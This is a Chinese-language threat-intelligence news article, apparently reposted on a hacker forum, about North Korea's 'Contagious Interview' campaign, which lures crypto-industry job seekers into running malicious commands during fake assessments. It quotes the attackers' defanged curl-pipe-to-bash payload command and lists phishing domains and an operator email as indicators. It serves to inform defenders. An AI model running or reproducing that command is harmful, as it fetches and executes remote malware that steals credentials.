过去一年,网络安全研究人员发现,朝鲜威胁行为者的活动呈激增态势 —— 他们利用军方级别的社会工程学技术,将目标锁定在加密货币行业的专业人士身上。
这场名为 “Contagious Interview(传染性面试)” 的攻击活动,采用了看似无害的求职申请流程,以此伪装复杂恶意软件的交付过程。
受害者会收到虚假公司发出的 “模拟评估邀请”,以为是应聘相关岗位的考核环节,最终却被诱骗执行恶意脚本。
攻击者拥有庞大的基础设施网络,会迅速替换被查封的域名和服务器,以躲避封禁、维持高频度的攻击接触。
2025 年初,攻击者开始注册诸如 skillquestions [.] com、talentcheck [.] pro 等域名,搭建钓鱼网站 —— 这些网站会诱导求职者以 “排查错误” 为由在终端中运行 shell 命令。
在评估过程中,页面会弹出伪造的错误提示(通常是摄像头访问请求),引导受害者在终端中粘贴 curl 命令。
这一简单的载荷下载步骤会迅速升级为全面攻陷:恶意软件会建立持久化访问权限,并窃取凭证信息。
这些步骤的精心策划,再加上定制化的域名,使得短短三个月内,已确认的受害者接触量超过 230 次。
SentinelLABS( SentinelOne 旗下实验室)的分析师指出,这些攻击活动的支撑,是对 Validin、VirusTotal 等威胁情报平台的持续监控。
当新的入侵指标(IOC)在 Maltrail 的 apt_lazarus [.] txt 等数据库中发布后,攻击者会立即注册社区账号,从而掌握自身基础设施暴露情况的最新信息。
他们不会投入精力对现有资产进行全面修改,而是在某个域名遭遇封禁时,直接搭建全新的服务器。
这种战略选择更看重运营灵活性,而非 “堡垒式” 防御,能让威胁行为者始终领先于封禁请求一步。
SentinelLABS 的研究人员发现,其基础设施的替换周期以 “小时” 为单位,而非 “周”。
当服务提供商封禁某个域名后,威胁行为者会立即配置新域名、迁移恶意软件分发服务器,并更新命令与控制(C2)端点。
(“liambrooksman” 伪装身份(邮箱:brooksliam534 [@]
gmail.com),经追踪为 cors-app 与 cors-parser 项目的维护者(来源:SentinelOne))
在幕后,攻击者通过 Slack 等团队协作平台进行协调:自动化机器人会发布新域名摘要,各操作人员则快速点击浏览这些预览信息。
“Contagious Interview” 攻击活动的核心,是一套极简却高效的感染机制。
受害者访问钓鱼网站后,会看到一个由 JavaScript 驱动的表单,该表单模拟 “实时编程评估” 场景。
当受害者触发伪造的错误提示时,页面会显示一条终端命令:
curl -s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash
执行该命令后,会获取一个 shell 脚本 —— 该脚本会先进行环境检测、识别受害者的操作系统,再下载定制化的攻击载荷。
随后,脚本会安装轻量级后门、写入 cron 任务以实现持久化,并通过 HTTPS 与攻击者控制的 C2 服务器通信,完成受攻陷主机的注册。
攻击的所有阶段,都会被服务器上的 ContagiousDrop Node.js 应用记录日志,并生成 client_ips_start_test [.] json 等 JSON 格式文件,其中包含详细的受害者信息记录。
(日志记录至 client_ips_start_test [.] json 文件(来源:SentinelOne))
这种 “社会工程学 + 自动化脚本” 的组合,在最大化感染率的同时,将攻击者的操作成本降至最低,也体现出朝鲜(DPRK)攻击能力的成熟。
凭借这些适应性战术 —— 基础设施快速迭代、情报驱动的资产探查、精简的载荷交付流程 —— 朝鲜威胁行为者持续构成动态且持久的威胁。
随着防御方不断强化检测协议,理解这一感染机制,对于在攻击链的 “初始接触” 阶段前将其阻断,至关重要。
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
